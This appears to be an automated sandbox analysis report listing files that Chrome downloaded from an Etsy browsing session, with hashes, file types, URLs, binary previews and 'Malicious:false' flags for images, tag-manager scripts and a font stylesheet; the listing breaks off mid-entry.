                                                                                                                                                                              Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/app-shell/globals/index.3109cc878e2735b5d361.js.LICENSE.(()=>{var e={20580:(e,t,n)=>{var i=n(99019);(function(){"use strict";var e=0;var t=1;var n=2;var s=3;var a=4;var r=5;var o=6;var u=7;var l=8;var c=9;var d={activedescendant:s,atomic:e,autocomplete:l,busy:e,checked:t,controls:a,describedby:a,disabled:e,dropeffect:c,expanded:n,flowto:a,grabbed:n,haspopup:e,hidden:e,invalid:l,label:u,labelledby:a,level:r,live:l,multiline:e,multiselectable:e,orientation:l,owns:a,posinset:r,pressed:t,readonly:e,relevant:c,required:e,selected:n,setsize:r,sort:l,valuemax:o,valuemin:o,valuenow:o,valuetext:u};var h={};h[e]=["false","true"];h[t]=["undefined","true","false","mixed"];h[n]=["undefined","true","false"];var p={autocomplete:["none","inline","list","both"],dropeffect:["none","copy","move","link","execute","popup"],invalid:["false","grammar","spelling","true"],live:["off","polite","assertive"],orientation:["hor
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13944
                                                                                                                                                                              Entropy (8bit):7.975185649450548
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AF1C9BA7F3076783D264F512C8E9068F
                                                                                                                                                                              SHA1:286DCBE2EE5A6C2F07126387CCF7862C78A15E8F
                                                                                                                                                                              SHA-256:149AD3BBB46C3BF2F2DF90589BF6C71642FD6C09DC52299EF4F97BBC55A8940E
                                                                                                                                                                              SHA-512:835FCF2D160FF0A06555354896EE1C43D5AB3BCF364EF4BF3DCD8C441B9B32DB0C65088508E2FEF2F6A137566050FF75C4CA5E33C61F8C75269FB05F7269AF43
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/54457829/r/il/876208/6292365604/il_340x270.6292365604_dg7z.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................5j...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................5rmdat....."*p...h4 2.j.@...A@.z.ki5....u.L.U.N..,..|..`T...|d:.)m...g...jK.,....:.o...".a...9..Y..3....b.k.6i...U..8....9.,Q.O.=.db.....L.*..........>p.Dnb.....NC..........3....^...t..E=...s..6.Ti....)xC...l..EK...j. ...%..T..+L....P.0\...+.W.q..g...C>...:.....P0-l..o....,..pEb.a..N..6...~..L...b...l...w.k+.Or.....-@x.}wR.........W%Am....?.{G...h....n.......VMEOY#..kGC....6~P....6.U.S"...O.j]...2..9+........l.&m.NA...zjGP..6.....0f..........C.x.P6&..n..!w{.........&...=k...8.....`rIG....T....'1..\..3....".7.x&.}.8...?...y"..0W..N(..q..... ......V......~."..%.6I..x....c......[.B..{..+......./P...!.. Kh...R...s..\.....[.a....}%.di.....s2.....".Fe.#5.ei......!..+...7.'c?.T.t5d.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):96572
                                                                                                                                                                              Entropy (8bit):7.996271003491113
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7E77B29B5503C45CA8E8D59DEC4ED14C
                                                                                                                                                                              SHA1:73FA21E85FB3469EBD7DFE6B1394B30586C64765
                                                                                                                                                                              SHA-256:F2D7E23B2C6DF54940AA9F42F9E7F7C56DFB20FF65030EBB80F85C9471E5578D
                                                                                                                                                                              SHA-512:C17BF1552779B5310E4E8AF3133459F08039094B89F3B1E387E073CB94E2739EE4C93723CE419AB4316D9924451EDAEFFA578BB74716B7F11BD31017340E20B4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/8cf28e/5830093630/iap_600x600.5830093630_prl4wx2x.jpg?version=0
                                                                                                                                                                              Preview:RIFF4y..WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .w..0(...*X.X.>a&.E$"!'......ej1.~....m......Om.. ....9O._.h..........S..........b?...?.^..u}W.H.l.(.....7......s.../..i....?5.../...._y....?......K...O....[..........................6.....o....!...[.s...k.......I......K....?....S.i..._..U?Y.=.../...............g........|..B........o..........[.../.?........u.....+.c..../..Q..........ad..S....h...3I.Q......H....d.c.rl...V. .rT...,k...^.........7..'..,........E.=Y5<
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1746
                                                                                                                                                                              Entropy (8bit):7.630631518469005
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BAEC3CB646A563F91D48F76DAAC4C55F
                                                                                                                                                                              SHA1:970DA0D794D61C97BDA64E7A948A82868BC36673
                                                                                                                                                                              SHA-256:993370A822562A3904C3E0E9DEE3A5163911302D6E9F447520640A6B0DFA39EC
                                                                                                                                                                              SHA-512:2B13E0AC46E1E2CF52655DD1E30A2D5B7DCF4064C780BB8D35D3A9BE6AAE3ABEB06D938E02A56C3DF5CDCF13400D402E35A4113D6A84763EDEF30CF9B0373B7A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/22659068/r/il/6bd5a9/4150399542/il_100x100.4150399542_hn46.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......d...d....pixi............ipma...................mdat........`...B2......,.@..["S.#F.a.W...N.p..):_..<i.....8..B....'9.........N...#.J.d.*[.V.x*N.k-..c....czl..q....B.8.T+f]rn^/.o....*.....6a...N..q.._.Hi.....X.y....)....c.4jUj..U.../.*.zA..G.J4.\..G3..2.c.....D......5......<.0.lba..A.....{...W...V....^X5Y.pU....5.{....mT.7....u......#..W...'}^.hn<...&A.^....D.w..o..Yu.Y$(a,..L.$v.T...0.v.c...~....K.aE)0.....9.Dm....7.^...yo.......y..('..-.!.j...B.A......U...w...-..(..4....-b.n+i"jU0#.k.E....&.p.. ...A.A....R....@..;. ..jJ#4.....V;.3.@....s...n...7.].u'.~........b4..X.a.{....9......H=bp...........F.]3/.s/..!..!...vF.'.....Mz..$v....'..%..9K....I....../..G..mr..N..J.Y.f..I.8Ga..U...+..UV........r..S.AEi_...7K^....f.......-.....Ry=..!....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1615)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):19809
                                                                                                                                                                              Entropy (8bit):5.339983320439078
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C720002805746DABED07FFFAD3441370
                                                                                                                                                                              SHA1:31F7E934EDA30C4837E3F276F1D86AFE79E75753
                                                                                                                                                                              SHA-256:CEAD3EC262B19EAB66896B105AF98BC13A04E856BFA3C8994378D4EBDCDB2A71
                                                                                                                                                                              SHA-512:C63997E34671524E7723E8D55B609B8BF30A09661411C784726A22E89B0966B9BA86E6D167CCA0CA5FC4DD6330FB10E1AD3D10E7FEACB012F6EF123DD483310B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://web.btncdn.com/v1/button.js
                                                                                                                                                                              Preview:(function(){try{var h=this;function k(a,c){var b=aa;return!!a||(b.log(c),!1)}function ba(a){return a}function l(a,c){for(var b=c.split(".");b.length&&a;)a=a[b.shift()];return a}function n(a,c){if(!Array.isArray(a))return!1;c=c||ba;for(var b=0,d=a.length;b<d;b++)if(!0===c(a[b]))return!0;return!1}function p(a,c,b){a=l(a,c);return"string"===typeof a?a:b||""}function q(a,c){var b=l(a,c);return Array.isArray(b)?b:[]}function r(a,c){for(var b=q(a,c),d=[],e=0,f=b.length;e<f;e++)d.push(t(b[e])?b[e]:{});return d}.function ca(a,c){if(!Array.isArray(a))return null;for(var b=0;b<a.length;b++){var d=a[b];if(c(d))return d}return null}function t(a){return!(!a||a.constructor!==Object)};function u(a,c){var b=(h.ButtonWebConfig||{})[a];return void 0===b?c:b}function x(a,c){var b=u(a,c);return"string"===typeof b?b:c||""}function y(a,c){var b=u(a,c);return"boolean"===typeof b?b:c||!1}function z(a){a=u(a);if("function"===typeof a)return a};var A=void 0;function B(){return"try{"+x("siteCatalyst","s")+".tl(t
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):43073
                                                                                                                                                                              Entropy (8bit):7.95058786932373
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3B03D3FF38E80E564BD51F84E2C9EE97
                                                                                                                                                                              SHA1:D722251AAB6F51B4EF68F1D33038542FCE56AFBE
                                                                                                                                                                              SHA-256:F3CB1A16B5FC2BE22F907E44EC33C6372CD905B394EE1541185A6E2853001F3C
                                                                                                                                                                              SHA-512:66E82FD077FA0FD4651B15EA095B9C06C55F7B1EDDD959872C92F136782986C99B380E119B4B0226119B8AAAA3BA28BF86C94EE640FB327F9FEDC65FF80FD394
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................@.........................!1A.."Qaq..2B..#R....3.....Cr.$4Db%S.................................4.......................!1..AQ."aq.....2#3BR......r............?.....|..J.d..)S0#.....*..u...z....*.!.J...A.%&9d.@.j..3.....>...8t.c.[..wF6.\...-.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):103112
                                                                                                                                                                              Entropy (8bit):7.996412286088818
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:100FF08924858DA8463ADA886675419A
                                                                                                                                                                              SHA1:8DBFBADA3D4D84CC70897695F1ACF7BEF99FC048
                                                                                                                                                                              SHA-256:ABA931C01352EFA014B1D025B61FA511B5F6C7D31722F1CFF618EFDC0CF44425
                                                                                                                                                                              SHA-512:E175BBE0DCD0AA17AB1CDE2617E702C4AD193BF980CE0D4221F426C4B40F8A1E714887015F98047E51DA83562D6C035FA0ACDE5AAFF6924DC2A89DA8FA903976
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/27377753/c/912/912/82/149/il/92ca9c/5607837327/il_600x600.5607837327_fklc.jpg
                                                                                                                                                                              Preview:RIFF....WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 ....p....*X.X.>i(.E."..1.=@...gl..tW..q..B.>.0..;#...e..'..]z.}....8g..?.........-.\......>..9.................x..........O...{.;.5.o.?......i....._..k.B?%...........................?`.k~..'......L....z..o..._.?.~....8.....7......>..k....W......+.......O....p~..................C...#.........~............W.........../.|............-x..0......;W.|{..N.......G.....e...f.Up.......`4.DB./...1.,..m.....*..%H..;..5.....@.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):519
                                                                                                                                                                              Entropy (8bit):4.915668738051221
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E4F77074C0FFBFAB377011E19283EB13
                                                                                                                                                                              SHA1:9160259165CA1EF84209D4DD675C3ED367BABFF1
                                                                                                                                                                              SHA-256:66599C34190F7A6A402B38664A30A9B564FC22510F51FA3C5F027FB91E7A0E51
                                                                                                                                                                              SHA-512:6EBF2429055BE6A945D7E3B84AF00B3A68247C8C85C6874C6A670985CF400B2BA06267601C5526B97BFC0D9678B63A33FC38726128E2E05CDC9EC04E450D2794
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://static.captcha-delivery.com/common/fonts/roboto/font-face.css
                                                                                                                                                                              Preview:@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: local('Roboto'),. url('./roboto.woff2') format('woff2'), /* https://caniuse.com/woff2 */. url('./roboto.woff') format('woff'); /* https://caniuse.com/woff */.}./* START: Add for DASBO-9363 */.@font-face {. font-family: 'Roboto-Bold';. font-style: normal;. font-weight: 400;. src: local('Roboto-Bold'),. url('./Roboto-Bold.ttf') format('ttf'); /* https://caniuse.com/ttf */.}./* END: Add for DASBO-9363 */.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3835)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):228484
                                                                                                                                                                              Entropy (8bit):5.544695181274997
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:73916A242921E3CA400298E81820A693
                                                                                                                                                                              SHA1:FB920A7FD944B92E8D0686A29F04366EB25F2639
                                                                                                                                                                              SHA-256:AE7453A48811B161EFF0C84B0FFAEE4815E13DFCF6A8DF566ACCA915DF86430F
                                                                                                                                                                              SHA-512:DD4E8366C67464151E68615691146226797F7D5C0C1D5C29C4CE73AD9CBD80033EA7AE3A6C1C5667BB4DDF730A346A57BE73FC27B00D6974E9CEC1CB1B8E3083
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=DC-9910951&l=dataLayer&cx=c
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-9910951","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"",
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3835)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):228474
                                                                                                                                                                              Entropy (8bit):5.544735051916833
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D702CF00EC8CF115949493860A3CADE5
                                                                                                                                                                              SHA1:EA03BC40750975E0E9EED571751BB744A0805A31
                                                                                                                                                                              SHA-256:040396860F6AF542EA843B75642A87C36CAA9D542C8FE2374E9A1EE66FCE2053
                                                                                                                                                                              SHA-512:70B036379463F501BD50753482840F5486C9F2511CA4989F46E640937F3A5BADEF84E3817B81BA5F6C3788F8CE0367A64FB6D2315E8CD56B1A591ADA6B58EBD4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=DC-8666735&l=dataLayer&cx=c
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-8666735","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"",
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):72647
                                                                                                                                                                              Entropy (8bit):7.9689161070100605
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9F3DAA37135C37848FECDBBEBA7C078C
                                                                                                                                                                              SHA1:69477C78B66EEE00ABFE442980A54560520C8FD3
                                                                                                                                                                              SHA-256:B6D2E21CA229862E88F04BBFD7687A8B997B3DEB098BE6800CECF18D0CA19934
                                                                                                                                                                              SHA-512:91B00C1548C8C8A9E713D3F1F7B8CC1007C96B85F5333A911B86AF93EA42560DFD0CC5929209D54F67C6168208C71148CF17EE71A99E7E2A6D053239D3AB19AF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................@.........................!1A.."Qaq...2.#B....R.3b..$r..C...%S4.................................<........................!.1A.Q."aq..2.B.#R....br.$3....C..............?..j.w..i.~i.9.."'1c.8...N.iA"'>.b..Q.....Pa..t.<..u..'49..D..E...B(t....&'h^..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):34532
                                                                                                                                                                              Entropy (8bit):7.992668391635251
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6614E501D93F73DDC1D106050B985FA4
                                                                                                                                                                              SHA1:4A15D0A12EF3CCF154D4CF1E19FA6581669A215E
                                                                                                                                                                              SHA-256:1E94A50155E52C5E1C5B0A9872231FC5BEB991D1E21E9A7C5BA76A3B0300317F
                                                                                                                                                                              SHA-512:05F8AAE96298198DA2975ED51FDD843D6C93CFF8E9C749E073D9E36794EFFFA233F64496312DBECE018ED647700084022CC2AEFAE92B738E21D511F66E7C7343
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/25096596/r/il/556d7b/4191673720/il_340x270.4191673720_1ydw.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma...................mdat....."*p...h4 2... ...A@.p3..)...><.....y.@V..U.`.qMz....UV~...yn.iO....Nb.1..r&.M.[Mu.../..=d.....:..A!o?....}.c..02.L..o"..7p..q...8........~....)qQ\/Ag..^T.9...G.....o'....|...#.#.P..E..e..<.<.j.$.Q.je......N.(w..b.izM&..o.ZW...R.B..4d]..kh.8..iw.>LY...m.q2..c.....+.d.t2..Lq.Y%..e.Q....o..J^..7C.?.=|.%R..t.J.........t....Q...5.FY@"...>f....E(.3@0..8.....9.I..p.....F.Y.O.?.\R>H1G.... .C..g......$.....Sq.7.c...#.mb;.>..=.q.d....5..3.p7K..\.=.e..]...x..k.........Z.).y.z........qR.. ....C.<.....V;.../mF.e....].7.s...G...a......xj.Q.[<..ivYL...D.G.b.... n.S,..]..$..4....;..p.A.HnY.O.L...DI$[.4....XI=...A4..^.M.m.i...F#..-Mn~.g.d?.. 8..........`..H3.x....v.w..b.3W.)..I|....&X.).B.nX....$H..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 75x75, components 3
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3649
                                                                                                                                                                              Entropy (8bit):7.320837148889528
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:33BCB4FF36884453FBE4194ADF49931A
                                                                                                                                                                              SHA1:2D0E24857E32960E653732063B02DD4C7CCA8C05
                                                                                                                                                                              SHA-256:9239534DA9AD46F765534C7D7A28AAB134AE087230908A86C7AC544275E668F3
                                                                                                                                                                              SHA-512:D866106CF93ED40DD16F866187E8AFBBB0EA2C2EDD29B7FE1AA2CF6EB2E745CDB6587FBB423D95B02DF26E57432485212798564AC6B3C014D0DD4BB948F33FE7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/969f94/5423104982/il_75x75.5423104982_92dw.jpg
                                                                                                                                                                              Preview:......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C....................................................................C.......................................................................K.K.."...............................................................................z.^.6.....dX.. ........]...E..i*`D..*W.8w....0"..r.].Gx.z..).pp.B.B.....e*~=....'..w......nP.D.zn.......n...O..F(..MU...A..w+....#.............................."!...........sf6a.H.......d..d. .!N..o:..Vi...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4684
                                                                                                                                                                              Entropy (8bit):7.900579224137577
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9EF999AF39AA378E30746D976ABAB94D
                                                                                                                                                                              SHA1:99435866471E17A3BB2A05BBB85BCA4ABB99E70A
                                                                                                                                                                              SHA-256:0636AC52372FCFA36432445D9CA309ACBFF101BB34A29A0029FDE2611886C586
                                                                                                                                                                              SHA-512:3A1B0F258FD503E37DB1CEAB05F72BB7AAB939DC14F1D3C800835FC890F54E0CB7DA6A43FE6CBC3D9FB68EE93A27BDC39B5271271E1ED6398A6FAB4E13CBF5C7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/5857649/r/il/ac1e12/6233923144/il_300x300.6233923144_gg1e.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................>...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma..................Fmdat....."%r...h4 2."D\.QE.P..?......cK.]u.+..0......_t.,......j4.|..^.|..D.......DZ.(....3I....X.y#PS..7A..ZX+%X;..Kb..~L..F........8...O)..V.........O?.....z....v.<.&.....7.6...J.U.z..M)..8C...T....h.jqd_..g.;.1.A.u.....:B3..+.D.........<.F&....A..r..ah...~.&@F.:...K..w...6y.N...o UxHSy.........M.QF....m.s0.K|L.2:.7i....P.....].#..4L.2.R.. .T..8J.f~\.i....8C&W.%.8..R....@..d.......f.......z.z..N^..... .@`z..F.-.^..6...N.WB 1T...P.'<..p....^.<B..[......!..H6...2.A...>....,b$3.......F..\...._...sD.....]Zw.|v..".......u..,Q.... .9.I'.^#0..7.}_u.a..d..z.+8=..!hRm....5l7<O."Q..@..-.~.....U\.9c.D.[|K.4...5...z..lqNb.8N<...8..V.<Z...;;n/J..0.......+I;..e.3[.._3.?.:J..idh.x]'..N..@......!..F..js/o.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):286977
                                                                                                                                                                              Entropy (8bit):5.547090214781242
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:55904B53A61AFA7F2E13EB03AFA3081E
                                                                                                                                                                              SHA1:BAFDECA290953F769F883498B7B58447BB9F4272
                                                                                                                                                                              SHA-256:3EDCC7D726C6663098F827D3513EB815BBD994322D1E95AF32A41C89F6CDD997
                                                                                                                                                                              SHA-512:DBA5071DFAB6E3739770ECB173871E755B332439FD9592B04ED6B2198019E9CE7B8B0D68E67DD18F7A3302694ABC808970669E0334B46A6FCE9B61FEF85D8B9F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=AW-995917074&l=dataLayer&cx=c
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":17,"vtp_instanceDestinationId":"AW-995917074","tag_id":11},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regi
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):59227
                                                                                                                                                                              Entropy (8bit):7.9672020658197695
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C36F709CDA83280CD01E81B2A16D02F3
                                                                                                                                                                              SHA1:98D8C51BA5C0201B143C1A9081CED70772A70CE4
